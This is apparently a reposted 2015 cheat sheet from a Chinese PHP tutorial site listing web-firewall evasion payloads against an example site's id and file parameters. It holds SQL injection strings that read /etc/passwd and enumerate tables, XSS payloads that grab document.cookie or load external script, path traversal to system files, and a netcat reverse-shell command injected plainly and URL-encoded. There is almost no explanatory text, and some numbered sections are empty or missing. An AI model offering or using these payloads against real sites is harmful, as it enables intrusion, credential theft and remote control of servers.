Source: 自学PHP网  Time: 2015-04-16 23:15
1. Identifying vulnerable points

http://www.site.com.tr/uyg.asp?id=123'+union+selec+1,2,3--
http://www.site.com.tr/uyg.asp?id=123'
http://www.site.com.tr/uyg.asp?id=123<12("/>

2. HTTP Parameter Pollution (HPP)

http://www.site.com.tr/uyg.asp?id=123&id=456
http://www.site.com.tr/uyg.asp?id=123+select+1,2,3+from+table
http://www.site.com.tr/uyg.asp?id=123+select+1&id=2,3+from+table
http://www.site.com.tr/uyg.asp?id=select/&id=/user&id=pass/&id=/from/*&id=*/users
id=select/*,*/user,pass/*,*/from/*,*/users

3. HTTP Parameter Fragmentation (HPF)

4. Encoding

URL Encode - %27
Double URL Encode - %2527
UTF-8 (2 byte) - %c0%a7
UTF-8 (JAVA) - \uc0a7
HTML Entity - &apos;
HTML Entity Number - Decimal - &#39;
Unicode URL Encoding - %u0027
Base64 - Jw==

uyg.asp?id=<script>alert(1)</script>
uyg.asp?id=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
uyg.asp?id=%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2531%2529%253c%252f%2573%2563%2572%2569%2570%2574%253e
uyg.asp?id=%3cscript%3ealert(1)%3c%2fscript%3c
uyg.asp?id=%3cscript%3ealert(1)%3c/script%3c
uyg.asp?id=%3cscript%3ealert%281%29%3c%2fscript%3c
uyg.asp?id=%%3c%2fsCrIpT%3e%3csCrIpT%3ealert(1)%3c%2fsCrIpT%3e
uyg.asp?id=%A2%BE%BCscript%BEalert(1)%BC/script%BE
uyg.asp?id=<a href="javascript#alert(1);">
uyg.asp?id=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
uyg.asp?id=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
uyg.asp?id=0;data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg=="+http-equiv="refresh" "
uyg.asp?id=123 or '1'='1
uyg.asp?id=123%20or%20%271%27=%271
uyg.asp?id=123%20or%20%c0%a7%c01%a71=%c0%a71
uyg.asp?id=123%2527%2520select%2520convert(int,@@servername)--
uyg.asp?id=123K29yKycxJz0nMQ==
uyg.asp?id=123;nc -e /bin/bash 192.168.1.3 12345;
uyg.asp?id=%61%3b%6e%63%20%2d%65%20%2f%62%69%6e%2f%62%61%73%68%20%31%39%32%2e%31%36%38%2e%31%2e%33%20%31%32%33%34%35%3b

5. Script tags

uyg.asp?id="+onmouseover="window.location='http://www.site.com.tr/code.js'
uyg.asp?id="+style%3d"x%3aexpression(alert(1))+
uyg.asp?id="+onkeypress="alert(23)"+"
uyg.asp?id=123); alert(document.cookie);//
uyg.asp?id=javascript:alert(1)
uyg.asp?id=alert(document.cookie)
uyg.asp?id=alert(document['cookie'])
uyg.asp?id=with(document)alert(cookie)
uyg.asp?id=";location=location.hash)//#0={};alert(0)
uyg.asp?id=//";alert(String.fromCharCode(88,83,83))
uyg.asp?id=%F6%3Cimg+onmouseover=prompt(/test/)//%F6%3E
uyg.asp?id=%'});%0aalert(1);%20//
uyg.asp?id=%";eval(unescape(location))//#%0Aalert(0)
uyg.asp?id=0;url=javascript:alert(1)" http-equiv="refresh" "
uyg.asp?id=onError="javascript:decipher(document.forms.cipher); alert(document.forms.cipher.stream.value); document.forms.cipher.stream.value = document.forms.cipher.stream_copy.value;
uyg.php?id=<script>String.fromCharCode(61)</script>
uyg.php?id=10+UNION+SELECT+LOAD_FILE(0x2f6574632f706173737764)
uyg.asp?id=if(substring(USER(),1,4)=0x726f6f74,SLEEP(5),1)

6. Cross-site scripting

uyg.asp?id=<img/src="xss.png"alt="xss">
uyg.asp?id=<object data="javascript:alert(1)">
uyg.asp?id=<object><param name="src" value="javascript:alert(1)"></param></object>
uyg.asp?id=<isindex type=image src=1 onerror=alert(1)>
uyg.asp?id=<isindex action=javascript:alert(1) type=image>
uyg.asp?id=<img src=x:alert(alt) onerror=eval(src) alt=0>
uyg.asp?id=<meta style="xss:expression(open(alert(1)))" />
uyg.asp?id=<!</textarea <body

uyg.asp?id=123+1-1 (id=123)
uyg.asp?id=123+1 (id=124)
uyg.asp?id=123+len(1234)-len(123) (id=124)
uyg.asp?id=123+len(@@server)-len(@@server)

uyg.php?id=1+union+select+1,2,3/*
uyg.php?id=1/*union*/union/*select*/select+1,2,3/*
uyg.php?id=1%2520union%2520select%25201,2,3/*
uyg.php?id=1%0Aunion%0Aselect%0A1,2,3/*
uyg.php?id=1/**/union%a0select/**/1,pass,3`a`from`users`
uyg.php?id=(0)union(select(table_schema),table_name,(0)from(information_schema.tables)having((table_schema)like(0x74657374)&&(table_name)!=(0x7573657273)))#
uyg.php?id=union(select(version()))--
uyg.php?id=123/*! union all select version() */--
uyg.php?id=123/*!or*/1=1;

uyg.php?id=1+union+select+1,2,3/*
uyg.php?id=1+union+select+1,2,3--
uyg.php?id=1+union+select+1,2,3#
uyg.php?id=1+union+select+1,2,3;%00

uyg.php?id=%3Cscript%3Ealert(document.cookie)%3C/script%00TESTTEST%3E
uyg.php?id=%3Cscript%3Ealert(document.cookie)%3C/script%20TESTTEST%3E
uyg.php?id=";eval(unescape(location))//#%0Aalert(0)

uyg.php?file=../../../../../etc/passwd/////[…]/////
uyg.php?file=../../../../../etc/passwd//////////////
uyg.php?file=.//././/././/./boot.ini

uyg.php?id%00TESTTEST=1+union+select+1,2,3
uyg.php?id%20TESTTEST=1+union+select+1,2,3
uyg.php?id=1234&"><script>alert(1)</script>=1234
uyg.php?id=%00><script>alert(123)</script>

9. URL rewriting